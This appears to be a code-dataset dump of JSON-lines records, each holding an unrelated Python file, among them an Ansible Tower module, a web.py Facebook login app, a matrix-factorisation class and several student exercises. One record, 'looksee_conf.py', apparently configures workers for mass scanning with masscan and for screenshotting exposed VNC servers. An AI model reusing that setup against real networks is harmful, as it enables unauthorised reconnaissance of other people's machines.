return\r\n","sub_path":"questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"376923619","text":"from network.SerotoninAVNetwork import *\nfrom scipy import *\n\nclass Simulation():\n def __init__(self, params):\n self.tau = 0.1 # In\n self.params = params\n self.tspan = arange(0, self.params[\"maxTime\"], self.tau)\n\n self.network = SerotoninAVNetwork(self.tau, self, self.params, \"Test Network1\")\n\n def run(self):\n for t in self.tspan:\n if t % 10 == 0:\n print(\"Time: \", t)\n self.network.step()","sub_path":"simulation/Simulation.py","file_name":"Simulation.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498829596","text":"#!/usr/bin/env python\n#coding: utf-8 -*-\n\n# (c) 2016, Wayne Witzel III \n#\n# This module is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This software is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this software. If not, see .\n\nDOCUMENTATION = '''\n---\nmodule: tower_job_launch\nversion_added: \"2.3\"\nshort_description: Launch an Ansible Job.\ndescription:\n - Launch an Ansible Tower jobs. See\n U(https://www.ansible.com/tower) for an overview.\noptions:\n job_template:\n description:\n - Name string of the job_template.\n required: True\n default: null\n job_explanation:\n description:\n - Job explanation field.\n required: False\n default: null\n job_type:\n description:\n - Job_type to use for the job, only used if prompt for job_type is set.\n required: False\n choices: [\"run\", \"check\", \"scan\"]\n default: null\n inventory:\n description:\n - Inventory to use for the job, only used if prompt for inventory is set.\n required: False\n default: null\n credential:\n description:\n - Credential to use for job, only used if prompt for credential is set.\n required: False\n default: null\n extra_vars:\n description:\n - Extra_vars to use for the job_template. Use '@' for a file.\n required: False\n default: null\n limit:\n description:\n - Limit to use for the job_template.\n required: False\n default: null\n tags:\n description:\n - Specific tags to use for from playbook.\n required: False\n default: null\n use_job_endpoint:\n description:\n - Disable launching jobs from job template.\n required: False\n default: False\n config_file:\n description:\n - Path to the Tower config file. See notes.\n required: False\n default: null\n\n\nrequirements:\n - \"ansible-tower-cli >= 3.0.2\"\n\nnotes:\n - If no I(config_file) is provided we will attempt to use the tower-cli library\n defaults to find your Tower host information.\n - I(config_file) should contain Tower configuration in the following format:\n host=hostname\n username=username\n password=password\n'''\n\n\nEXAMPLES = '''\n tower_job_launch:\n job_template: \"My Job Template\"\n config_file: \"~/tower_cli.cfg\"\n register: job\n tower_job_wait:\n job_id: job.id\n timeout: 120\n'''\n\nimport os\n\ntry:\n import tower_cli\n import tower_cli.utils.exceptions as exc\n from tower_cli.utils import parser\n from tower_cli.conf import settings\n\n HAS_TOWER_CLI = True\nexcept ImportError:\n HAS_TOWER_CLI = False\n\n\ndef tower_auth_config(module):\n config_file = module.params.get('config_file')\n if not config_file:\n return {}\n\n config_file = os.path.expanduser(config_file)\n if not os.path.exists(config_file):\n module.fail_json(msg='file not found: %s' % config_file)\n if os.path.isdir(config_file):\n module.fail_json(msg='directory can not be used as config file: %s' % config_file)\n\n with open(config_file, 'rb') as f:\n return parser.string_to_dict(f.read())\n\n\ndef main():\n module = AnsibleModule(\n argument_spec = dict(\n job_template = dict(required=True),\n job_type = dict(choices=['run', 'check', 'scan']),\n inventory = dict(),\n credential = dict(),\n limit = dict(),\n tags = dict(),\n extra_vars = dict(type='list', required=False),\n config_file = dict(),\n ),\n supports_check_mode=False\n )\n\n if not HAS_TOWER_CLI:\n module.fail_json(msg='ansible-tower-cli required for this module')\n\n json_output = {}\n\n tower_auth = tower_auth_config(module)\n with settings.runtime_values(**tower_auth):\n try:\n params = module.params.copy()\n job = tower_cli.get_resource('job')\n\n try:\n jt_name = params.pop('job_template')\n jt = tower_cli.get_resource('job_template').get(name=jt_name)\n except exc.NotFound as excinfo:\n module.fail_json(msg='{} job_template: {}'.format(excinfo, jt_name), changed=False)\n\n result = job.launch(jt['id'], no_input=True, **params)\n json_output['id'] = result['id']\n json_output['status'] = result['status']\n except (exc.ConnectionError, exc.BadRequest) as excinfo:\n module.fail_json(msg='{}'.format(excinfo), changed=False)\n\n json_output['changed'] = result['changed']\n module.exit_json(**json_output)\n\n\nfrom ansible.module_utils.basic import AnsibleModule\nif __name__ == '__main__':\n main()\n","sub_path":"library-old/tower_job_launch.py","file_name":"tower_job_launch.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525113722","text":"#6 Escribí un programa que dada una lista de strings verifique si se encuentran en una frase dada.\n\nimport re\nlista_strings = [\"hoy\", \"sol\", \"pileta\",\"amigos\"]\nfrase = \"Hoy tomamos sol en la playa con mis amigos\"\nfor i in lista_strings:\n patron = i\n if re.search(patron, frase) is not None:\n print(\"la palabra \" + r\"'\" + i + r\"'\" \" se encuentra en la frase dada\")\n else:\n print(\"la palabra \" + r\"'\" + i + r\"'\" \" no se encuentra en la frase dada\")","sub_path":"expresiones regulares/tp 3 ej6.py","file_name":"tp 3 ej6.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"215661273","text":"'''\r\nAbbiamo immagini in formato png ottenute inserendo su di uno sfondo monocolore rettangoli\r\ndi vari colori i cui assi sono sempre parallei agli assi dell'immagine.\r\n\r\nVedi ad esempio l'immagine Img1.png\r\n\r\nPer caricare e salvare immagini PNG usate le funzioni load e save che abbiamo preparato nel modulo immagini.py .\r\n\r\nScrivere una funzione quadrato(filename, C) che prende in input:\r\n- il percorso di un file (filename) che contine un immagine in formato png della tipologia appena descritta.\r\n- una tupla C che rappresenta un colore in formato RGB (3 valori interi tra 0 e 255 compresi)\r\n\r\nLa funzione deve restituire nell'ordine:\r\n- la lunghezza del lato del quadrato pieno di dimensione massima e colore C interamente visibile nell'immagine.\r\n- le coordinate (x,y) del pixel dell'immagine che corrisponde alla posizione all'interno dell'immagine del punto in alto a sinistra del quadrato.\r\n\r\nIn caso ci siano più quadrati di dimensione massima, va considerato quello il cui punto\r\nin alto a sinistra occupa la riga minima (e a parita' di riga la colonna minima) all'interno dell' immagine.\r\n\r\nSi può assumere che nell'immagine e' sempre presente almeno un pixel del colore cercato.\r\n\r\nPer gli esempi vedere il file grade01.txt\r\n\r\nATTENZIONE: Il timeout è impostato a 10*N secondi (con N numero di test del grader).\r\n'''\r\n\r\nfrom immagini import *\r\n\r\ndef getW(img):\r\n return len(img[0])\r\n\r\ndef getH(img):\r\n return len(img)\r\n\r\ndef buildPrefixSum(psum, img, c):\r\n W, H = getW(img), getH(img)\r\n for i in range(H+1):\r\n psum.append([])\r\n for j in range(W+1):\r\n if i == 0 or j == 0:\r\n psum[i].append(0)\r\n else:\r\n psum[i].append((0 if img[i-1][j-1] != c else 1) + psum[i-1][j] + psum[i][j-1] - psum[i-1][j-1])\r\n\r\ndef queryPrefixSum(psum, i1, j1, i2, j2):\r\n return psum[i2+1][j2+1] - psum[i2+1][j1] - psum[i1][j2+1] + psum[i1][j1]\r\n\r\ndef updateBestAnsw(img, i, j, c, bestLen, bestX, bestY, psum, H, W):\r\n if img[i][j] == c:\r\n while i+bestLen= H:\r\n break\r\n for j in range(W):\r\n if j + bestLen >= W:\r\n break\r\n bestLen, bestX, bestY = updateBestAnsw(img, i, j, c, bestLen, bestX, bestY, psum, H, W)\r\n return (bestLen, (bestX, bestY))\r\n\r\nif __name__=='__main__':\r\n print(quadrato('test.png', (0,0,0)))\r\n","sub_path":"students/1811809/homework03/program01.py","file_name":"program01.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"328315280","text":"#!/usr/bin/python2.6\n#\n# Copyright (C) Christian Thurau, 2010. \n# Licensed under the GNU General Public License (GPL). \n# http://www.gnu.org/licenses/gpl.txt\n#$Id: sivm.py 22 2010-08-13 11:16:43Z cthurau $\n#$Author: cthurau $\n\"\"\" \nPyMF Simplex Volume Maximization for CUR [1]\n\n\tSIVM: class for SiVM\n\n[1] C. Thurau, K. Kersting, and C. Bauckhage. Yes We Can - Simplex Volume \nMaximization for Descriptive Web-Scale Matrix Factorization. In Proc. Int. \nConf. on Information and Knowledge Management. ACM. 2010.\n\"\"\"\n\n__version__ = \"$Revision: 11 $\"\n\nimport scipy.sparse\nimport numpy as np\nfrom scipy import inf\n\nfrom dist import *\nfrom aa import AA\n\n__all__ = [\"SIVM\"]\n\nclass SIVM(AA):\n\t\"\"\" \t\n\tSIVM(data, num_bases=4, niter=100, show_progress=True, compW=True)\n\t\n\t\n\tSimplex Volume Maximization. Factorize a data matrix into two matrices s.t.\n\tF = | data - W*H | is minimal. H is restricted to convexity. W is iteratively\n\tfound by maximizing the volume of the resulting simplex (see [1]).\n\t\n\tParameters\n\t----------\n\tdata : array_like\n\t\tthe input data\n\tnum_bases: int, optional \n\t\tNumber of bases to compute (column rank of W and row rank of H). \n\t\t4 (default)\n\tniter: int, optional\n\t\tNumber of iterations of the alternating optimization.\n\t\t100 (default)\n\tshow_progress: bool, optional\n\t\tPrint some extra information\n\t\tFalse (default)\n\tcompW: bool, optional\n\t\tCompute W (True) or only H (False). Useful for using basis vectors\n\t\tfrom another convexity constrained matrix factorization function\n\t\t(e.g. svmnmf) (if set to \"True\" niter can be set to \"1\")\n\tcompH: bool, optional\n\t\tCompute H (True) or only H (False). Useful for using precomputed\n\t\tbasis vectors.\n\tdist_measure: string, optional\n\t\tThe distance measure for finding the next best candidate that \n\t\tmaximizes the simplex volume ['l2','l1','cosine','sparse_graph_l2']\n\t\t'l2' (default)\n\toptimize_lower_bound: bool, optional\n\t\tUse the alternative selection criterion that optimizes the lower\n\t\tbound (see [1])\n\t\tFalse (default)\n\t\n\tAttributes\n\t----------\n\t\tW : \"data_dimension x num_bases\" matrix of basis vectors\n\t\tH : \"num bases x num_samples\" matrix of coefficients\n\t\t\n\t\tferr : frobenius norm (after applying .factoriz())\t\t\n\t\n\tExample\n\t-------\n\tApplying SIVM to some rather stupid data set:\n\t\n\t>>> import numpy as np\n\t>>> data = np.array([[1.0, 0.0, 2.0], [0.0, 1.0, 1.0]])\n\t>>> sivm_mdl = SIVM(data, num_bases=2, niter=10)\n\t>>> sivm_mdl.initialization()\n\t>>> sivm_mdl.factorize()\n\t\n\tThe basis vectors are now stored in sivm_mdl.W, the coefficients in sivm_mdl.H. \n\tTo compute coefficients for an existing set of basis vectors simply\tcopy W \n\tto sivm_mdl.W, and set compW to False:\n\t\n\t>>> data = np.array([[1.5, 1.3], [1.2, 0.3]])\n\t>>> W = np.array([[1.0, 0.0], [0.0, 1.0]])\n\t>>> sivm_mdl = SIVM(data, num_bases=2, niter=1, compW=False)\n\t>>> sivm_mdl.initialization()\n\t>>> sivm_mdl.W = W\n\t>>> sivm_mdl.factorize()\n\t\n\tThe result is a set of coefficients sivm_mdl.H, s.t. data = W * sivm_mdl.H.\n\t\"\"\"\n\t\n\t_vstring = 'pymf-svmnmf v0.1'\n\n\tdef __init__(self, data, num_bases=4, niter=100, \n\t\t\t\tshow_progress=False, compW=True, compH=True, \n\t\t\t\tdist_measure='l2'):\n\n\t\t# call inherited method\t\t\n\t\tAA.__init__(self, data, num_bases=num_bases, niter=niter, show_progress=show_progress, compW=compW)\n\t\t\t\n\t\tself._dist_measure = dist_measure\t\t\t\n\t\tself._compH = compH\t\t\n\n\t\t# assign the correct distance function\n\t\tif self._dist_measure == 'l1':\n\t\t\t\tself._distfunc = l1_distance\n\t\t\t\t\n\t\telif self._dist_measure == 'l2':\n\t\t\t\tself._distfunc = l2_distance\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\telif self._dist_measure == 'cosine':\t\t\t\t\n\t\t\t\tself._distfunc = cosine_distance\n\t\t\t\t\n\t\telif self._dist_measure == 'kl':\n\t\t\t\tself._distfunc = kl_divergence\t\n\t\t\t\t\t\t\n\t\telif self._dist_measure == 'sparse_graph_l2':\n\t\t\t\tself._distfunc = sparse_graph_l2_distance\n\n\tdef _distance(self, idx):\n\t\t\t# compute distances of a specific data point to all\n\t\t\t# other samples\t\t\t\n\t\t\tif scipy.sparse.issparse(self.data):\n\t\t\t\tstep = self.data.shape[1]\n\t\t\telse:\t\n\t\t\t\tstep = 50000\t\n\t\t\t\t\n\t\t\td = np.zeros((self.data.shape[1],1))\t\t\n\t\t\tvec = self.data[:, idx:idx+1]\t\n\t\t\tself._print_cur_status('compute distance to node ' + str(idx))\t\t\t\t\t\t\t\t\t\n\t\t\tself._prog_bar(np.round(self.data.shape[1]/step))\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t# slice data into smaller chunks\n\t\t\tfor idx_start in range(0,self.data.shape[1],step):\t\t\t\t\t\n\t\t\t\tif idx_start + step > self.data.shape[1]:\n\t\t\t\t\tidx_end = self.data.shape[1]\n\t\t\t\telse:\n\t\t\t\t\tidx_end = idx_start + step\n\n\t\t\t\td[idx_start:idx_end,0:1] = self._distfunc(self.data[:,idx_start:idx_end], vec)\n\t\t\t\tself._update_prog_bar()\t\n\t\t\t\n\t\t\treturn d\n\t\t\n\tdef initialization(self):\n\t\t\t# Fastmap like initialization\n\t\t\t# set the starting index for fastmap initialization\t\t\n\t\t\tcur_p = 0\t\t\n\t\t\tself.select = []\n\t\t\t\n\t\t\t# after 3 iterations the first \"real\" index is found\n\t\t\tfor i in range(3):\t\t\t\t\t\t\t\t\n\t\t\t\td = self._distance(cur_p)\t\t\n\t\t\t\tcur_p = np.argmax(d)\n\t\t\t\t\n\t\t\t# store maximal found distance -> later used for \"a\" (->updateW) \n\t\t\tself._maxd = np.max(d)\t\t\t\t\t\t\n\t\t\tself.select.append(cur_p)\n\t\t\t\t\n\t\t\tif self._compH:\n\t\t\t\tself.H = np.zeros((self._num_bases, self._num_samples))\n\t\t\t\t\n\t\t\tself.W = np.zeros((self._data_dimension, self._num_bases))\n\t\t\tif scipy.sparse.issparse(self.data):\n\t\t\t\tself.W = scipy.sparse.csc_matrix(self.W)\n\n\tdef updateW(self):\t\t\n\t\t\t\t\t\t\t\t\n\t\t# initialize some of the recursively updated distance measures ....\t\t\n\t\td_square = np.zeros((self.data.shape[1],1))\n\t\td_sum = np.zeros((self.data.shape[1],1))\n\t\td_i_times_d_j = np.zeros((self.data.shape[1],1))\n\t\tdistiter = np.zeros((self.data.shape[1],1))\n\t\ta = np.log(self._maxd**2)\n\t\t\n\t\tfor l in range(self._num_bases-1):\t\t\t\t\t\t\t\t\t\t\n\t\t\td = self._distance(self.select[-1])\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t# take the log of d**2 (usually more stable that d)\n\t\t\td = np.log(d**2)\t\t\t\n\t\t\td_i_times_d_j += d * d_sum\t\t\t\t\t\t\t\t\t \n\t\t\td_sum += d\n\t\t\td_square += d**2\n\t\t\t\n\t\t\tdistiter = d_i_times_d_j + a*d_sum - ((l + 1.0)/2.0) * d_square\t\t\n\t\t\t\n\t\t\t# remove the selected data point from the list of possible candidates\n\t\t\tdistiter[self.select, :] = -inf\n\t\t\t\n\t\t\t# detect the next best data point\n\t\t\tself._print_cur_status('searching for next best node ...')\t\t\t\t\t\n\t\t\tself.select.append(np.argmax(distiter))\n\t\t\tself._print_cur_status('cur_nodes: ' + str(self.select))\n\n\t\t# sort indices, otherwise h5py won't work\n\t\tself.W = self.data[:, np.sort(self.select)]\n\t\t\n\t\t# \"unsort\" it again to keep the correct order\n\t\tself.W = self.W[:, np.argsort(self.select)]\n\t\t\n\tdef factorize(self):\n\t\t\"\"\"Do factorization s.t. data = dot(dot(data,beta),H), under the convexity constraint\n\t\t\tbeta >=0, sum(beta)=1, H >=0, sum(H)=1\n\t\t\"\"\"\n\t\t# compute new coefficients for reconstructing data points\t\t\n\t\tif self._compW:\n\t\t\tself.updateW()\n\t\t\t\n\t\t# compute H and some error measures\n\t\tif self._compH:\t\t\t\n\t\t\tself.updateH()\t\t\t\t\t\t\t\t\n\t\t\tself.ferr = np.zeros(1)\n\t\t\tif not scipy.sparse.issparse(self.data) :\n\t\t\t\tself.ferr[0] = self.frobenius_norm()\t\t\n\t\t\t\tself._print_cur_status(' FN:' + str(self.ferr[0]))\n\t\t\t\t\t\nif __name__ == \"__main__\":\n\timport doctest \n\tdoctest.testmod()\t","sub_path":"Multi_target/Code/CUR/PyMF-0.1.1/build/lib/pymf/sivm.py","file_name":"sivm.py","file_ext":"py","file_size_in_byte":6968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"430681311","text":"import json\nimport os\nimport time\nimport urllib\nimport urlparse\n\nimport web\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import sessionmaker\nfrom web.contrib.template import render_jinja\n\nfrom models import engine\nfrom models import User\n\n\nFACEBOOK_APP_ID = \"000000000000000\"\n\nFACEBOOK_APP_SECRET = \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\n\n\nurls = (\n '/', 'MainHandler',\n '/login', 'LoginHandler',\n '/logout', 'LogoutHandler',\n '/periods', 'PeriodsHandler',\n)\n\n\ndef load_sqla(handler):\n web.ctx.orm = scoped_session(sessionmaker(bind=engine))\n try:\n return handler()\n except web.HTTPError:\n web.ctx.orm.commit()\n raise\n except:\n web.ctx.orm.rollback()\n raise\n finally:\n web.ctx.orm.commit()\n\n\napplication = web.application(urls, globals())\napplication.add_processor(load_sqla)\nworking_dir = os.path.dirname(__file__)\nrender = render_jinja(os.path.join(working_dir, '.'), encoding='utf-8')\n\n\ndef path_url():\n return web.ctx.home + web.ctx.fullpath\n\n\nclass BaseHandler():\n def current_user(self):\n \"\"\"Returns the logged in Facebook user or None.\"\"\"\n\n if not hasattr(self, \"_current_user\"):\n self._current_user = None\n user_id = web.cookies().get('fb_user')\n if user_id:\n self._current_user = web.ctx.orm.query(User).filter_by(id=user_id).first()\n\n return self._current_user\n\n\nclass LoginHandler(BaseHandler):\n def GET(self):\n if self.current_user():\n web.seeother('/')\n return\n\n data = web.input(code=None)\n args = dict(client_id=FACEBOOK_APP_ID, redirect_uri=path_url())\n if data.code is None:\n web.seeother(\n 'http://www.facebook.com/dialog/oauth?' +\n urllib.urlencode(args))\n return\n\n args['code'] = data.code\n args['client_secret'] = FACEBOOK_APP_SECRET\n response = urlparse.parse_qs(\n urllib.urlopen(\n \"https://graph.facebook.com/oauth/access_token?\" +\n urllib.urlencode(args)).read())\n access_token = response[\"access_token\"][-1]\n profile = json.load(\n urllib.urlopen(\n \"https://graph.facebook.com/me?\" +\n urllib.urlencode(dict(access_token=access_token))))\n\n user = User(id=str(profile[\"id\"]), name=profile[\"name\"],\n access_token=access_token, profile_url=profile[\"link\"])\n user = web.ctx.orm.merge(user) # Merge flying and persistence object\n web.ctx.orm.add(user)\n\n web.setcookie(\n 'fb_user', str(profile['id']), expires=time.time() + 7 * 86400)\n return web.seeother('/')\n\n\nclass LogoutHandler():\n def GET(self):\n web.setcookie('fb_user', '', expires=time.time() - 86400)\n web.seeother('/')\n\n\nclass MainHandler(BaseHandler):\n def GET(self):\n return render.index(user=self.current_user())\n\n\nif __name__ == '__main__':\n application.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"445173033","text":"'''\nBrittany Manuel -- 11449415\nCptS 315\nHomework 1\nmain.py\n'''\n\nfrom helper import *\n\n####################\n# Data Parsing #\n####################\ndef data_parsing(flag):\n \n\n\n ################\n # GET DATA #\n ################\n buckets, items = set_data()\n items = get_items(buckets)\n items.sort()\n if flag: print (\"Data compiled, you have \" + str(len(buckets)) + \" buckets and \" + str(len(items)) + \" unique items.\")\\\n\n\n\n ################\n # SINGLES #\n ################\n #Count singles\n counted = single_count(buckets, items)\n\n #Check support\n supported = support_check(counted, 100)\n if flag: print (\"There are \" + str(len(supported)) + \" supported singles\")\n \n\n\n ################\n # PAIRS #\n ################\n #Make pairs\n pairs = create_pairs(supported)\n pairs = to_dict(pairs)\n if flag: print (\"There are \" + str(len(pairs)) + \" pairs.\")\n \n #Count pairs\n # countedPairs = pair_count(buckets, pairs)\n countedPairs = count(buckets, pairs, True)\n\n #Check support\n supportedPairs = support_check(countedPairs,100)\n if flag: print (\"There are \" + str(len(supportedPairs)) + \" supported pairs\")\n \n #Check implications\n implicationsA = (a_implies_b(supportedPairs, supported, [], True))\n implicationsA = (a_implies_b(supportedPairs, supported, implicationsA, False))\n \n #Sort for lexi, lefthand rule\n for i in range(3):\n implicationsA = sorted(implicationsA, key=lambda row: row[i]) \n\n #Prep for output\n partA = make_list(implicationsA, 5)\n\n\n\n ################\n # TRIPLES #\n ################\n #Make triples\n triples = create_triples(supportedPairs, supported)\n triples = to_dict(triples)\n if flag: print (\"There are \" + str(len(triples)) + \" triples\")\n\n #Count Triples\n # countedTriples = triple_count(buckets, triples)\n countedTriples = count(buckets, triples, False)\n\n #Check support\n supported_triples = support_check(triples, 100)\n if flag: print (\"There are \" + str(len(supported_triples)) + \" supported triples\")\n \n #Check implications\n implicationsB = []\n for i in range(1, 4):\n implicationsB = (ab_implies_c(supported_triples, supportedPairs, implicationsB, i))\n \n #Sort for lexi, lefthand rule\n for i in range(3):\n implicationsB = sorted(implicationsB, key=lambda row: row[i]) \n\n #Prep for output\n partB = make_list(implicationsB, 5)\n\n return partA, partB\n\n\n\n####################\n# Main #\n####################\nif __name__ == '__main__':\n\n start_time = time.time()\n partA, partB = data_parsing(False)\n out_file(partA, partB)\n print(\"Finished in: \" + str(round(time.time() - start_time)) + \" seconds.\")","sub_path":"Homework 1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"470560136","text":"\"\"\" This was originally intended to house per-worker config. It has\ngrown and should be refactored.\n\"\"\"\n\nimport logging\nimport os\nimport socket\nimport workers\n\nfrom setproctitle import setproctitle\n\nfrom tasa.store import connection\n\nlog = logging.getLogger(__name__)\n\ndef run(WorkerClass):\n def wrapped():\n worker = WorkerClass()\n worker_identifier = '%s:%s:%s' % (\n socket.gethostname(), worker.__class__.__name__, os.getpid())\n setproctitle(worker_identifier)\n connection.client_setname(worker_identifier)\n log.info('Started worker: %s' % worker_identifier)\n for job in worker:\n if job:\n log.debug('Completed job: %s', repr(job)[:50])\n return wrapped\n\n# host_regex, func, count\nworkers = [\n {'host': r's\\d+',\n 'func': run(workers.MasscanWorker),\n 'count': 1,\n },\n {'host': r'cloud-worker',\n 'func': run(workers.RFBScreenshotWorker),\n 'count': 20,\n },\n {'host': r'cloud-worker',\n 'func': run(workers.RFBPrintWorker),\n 'count': 80,\n },\n ]\n","sub_path":"looksee/looksee_conf.py","file_name":"looksee_conf.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"411260652","text":"\"\"\"\n==============================\n동심원 데이터 분석(학생한명)\n==============================\n\n학생당 실험당\n\"\"\"\n__author__ = 'byeungchun'\n\nimport h5py\nimport numpy as np\nimport preprocessing as pp\nimport pandas as pd\n\ndef read_student(totalDB):\n dsets = h5py.File(totalDB,'r')\n dset = dsets['d100'] #학생당 실험당 하나 추출\n dset = np.array(dset)\n dset = dset[:,:,50:200] #실험전 -0.4 ~ -0.1초만 추출\n dset = pp.filterByFrequency(dset,[2]) #alpha 채널만 분리\n dset = dset[0,:,:,:] #filterByBrequncy 함수결과가 4차원으로 오기 떄문에 1차원 버림\n return dset\n\ndef calc_stats(dset,cutoffSigma):\n dset_mean_time = dset.mean(axis=2)\n dset_std_time = dset.std(axis=2)\n dset_mean_time_mu =dset_mean_time.mean(axis=1)\n dset_mean_time_sigma = dset_mean_time.std(axis=1)\n lst1sigma = []\n for i in range(dset_mean_time.shape[0]):\n _mu = dset_mean_time_mu[i]\n _sigma = dset_mean_time_sigma[i]\n _arr = dset_mean_time[i,:]\n _arr = np.abs((_arr-_mu) / _sigma)\n _notCutoff = _arr < cutoffSigma\n lst1sigma.append(_notCutoff)\n #dset_norm_abs = np.abs((dset-dset_mean_time_mu) / dset_mean_time_sigma)\n return lst1sigma\n\ndef calc_mean(dset,lst1sigma):\n lstMeanBy1sigma = []\n for i in range(dset.shape[0]):\n _arr = dset[i,lst1sigma[i],:]\n _meanBy1sigma = np.mean(_arr,axis=0)\n lstMeanBy1sigma.append(_meanBy1sigma)\n return lstMeanBy1sigma\n\nfrom sklearn.cluster import KMeans\ndef exe_kmeans(lstMeanBy1sigma):\n _arr = np.array(lstMeanBy1sigma)\n kmeans = KMeans(n_clusters=3)\n kmeans.fit(_arr)\n _cat = kmeans.predict(_arr)\n df = pd.DataFrame(_arr)\n df['cat'] = _cat\n #df[df.cat == 1].ix[:,:-1].T\n #res = df.T\n return df\n\ndef init(cutoffSigma=1):\n totalDB = 'D:/workspace/eeg/minlab/test2.hdf5'\n dset = read_student(totalDB)\n lst1sigma = calc_stats(dset,cutoffSigma)\n lstMeanBy1sigma = calc_mean(dset,lst1sigma)\n\n return lstMeanBy1sigma\n\nif __name__ == \"__main__\":\n init()","sub_path":"sample/eeganalysisbystudent.py","file_name":"eeganalysisbystudent.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"521688219","text":"# THIS CODE IS MY OWN WORK, IT WAS WRITTEN WITHOUT CONSULTING CODE\n# WRITTEN BY OTHER STUDENTS.\n# Simon Marty\n\nimport numpy as np\nimport numpy.testing as npt\nimport time\n\n\ndef gen_random_samples():\n \"\"\"\n Generate 5 million random samples using the\n numpy random.randn module.\n\n Returns\n ----------\n sample : 1d array of size 5 million\n An array of 5 million random samples\n \"\"\"\n return np.random.randn(5000000)\n\n\ndef sum_squares_for(samples: list):\n \"\"\"\n Compute the sum of squares using a forloop\n\n Parameters\n ----------\n samples : 1d-array with shape n\n An array of numbers.\n\n Returns\n -------\n ss : float\n The sum of squares of the samples\n timeElapse: float\n The time it took to calculate the sum of squares (in seconds)\n \"\"\"\n start_time = time.time()\n ss = 0\n mean = np.mean(samples)\n for i in samples:\n ss += pow((i - mean), 2)\n return ss, time.time() - start_time\n\n\ndef sum_squares_np(samples: list):\n \"\"\"\n Compute the sum of squares using Numpy's dot module\n\n Parameters\n ----------\n samples : 1d-array with shape n\n An array of numbers.\n\n Returns\n -------\n ss : float\n The sum of squares of the samples\n timeElapse: float\n The time it took to calculate the sum of squares (in seconds)\n \"\"\"\n start_time = time.time()\n ss = 0\n\n l = samples - np.mean(samples)\n ss = np.dot(l, l)\n\n return ss, time.time() - start_time\n\n\ndef main():\n # generate the random samples\n samples = gen_random_samples()\n # call the sum of squares\n ssFor, timeFor = sum_squares_for(samples)\n # call the numpy version\n ssNp, timeNp = sum_squares_np(samples)\n # make sure they're the same value\n npt.assert_almost_equal(ssFor, ssNp, decimal=5)\n # print out the values\n print(\"Time [sec] (for loop):\", timeFor)\n print(f\"SS: {ssFor}\")\n print(\"Time [sec] (np loop):\", timeNp)\n print(f\"SS: {ssNp}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cs334-ml/hw1-smarty/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"260212853","text":"import requests\nimport json\nimport sys\n\nfrom django.conf import settings\n\n# from superlists import settings\n#\n# DJANGO_SETTINGS_MODULE = settings\n\n\ndef main():\n SUCCESS = 'OK'\n WARNING = 'WARN'\n ERROR = 'ERROR'\n NONE = 'NONE'\n\n data = {'projectKey': settings.SONAR_PROJECTKEY}\n url = settings.SONAR_URL + '/api/qualitygates/project_status'\n request = requests.get(url=url, params=data)\n\n print(request.status_code)\n if request.status_code == 200:\n print(request.content)\n data = json.loads(request.content)\n project_status = data.get('projectStatus', {})\n status = project_status.get('status', '')\n\n if status == SUCCESS:\n sys.exit(0)\n elif status == WARNING or status == ERROR or status == NONE:\n sys.exit(1)\n else:\n sys.exit(1)\n else:\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scanner_result_process.py","file_name":"scanner_result_process.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263367030","text":"\"\"\"This module contains functional for Base RP items management.\"\"\"\n\n# Copyright (c) 2023 EPAM Systems\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License\n\nfrom reportportal_client.core.rp_requests import HttpRequest\n\n\nclass BaseRPItem(object):\n \"\"\"This model stores attributes related to RP item.\"\"\"\n\n def __init__(self, rp_url, session, project_name,\n launch_uuid, generated_id):\n \"\"\"Initialize instance attributes.\n\n :param rp_url: report portal url\n :param session: Session object\n :param project_name: RP project name\n :param 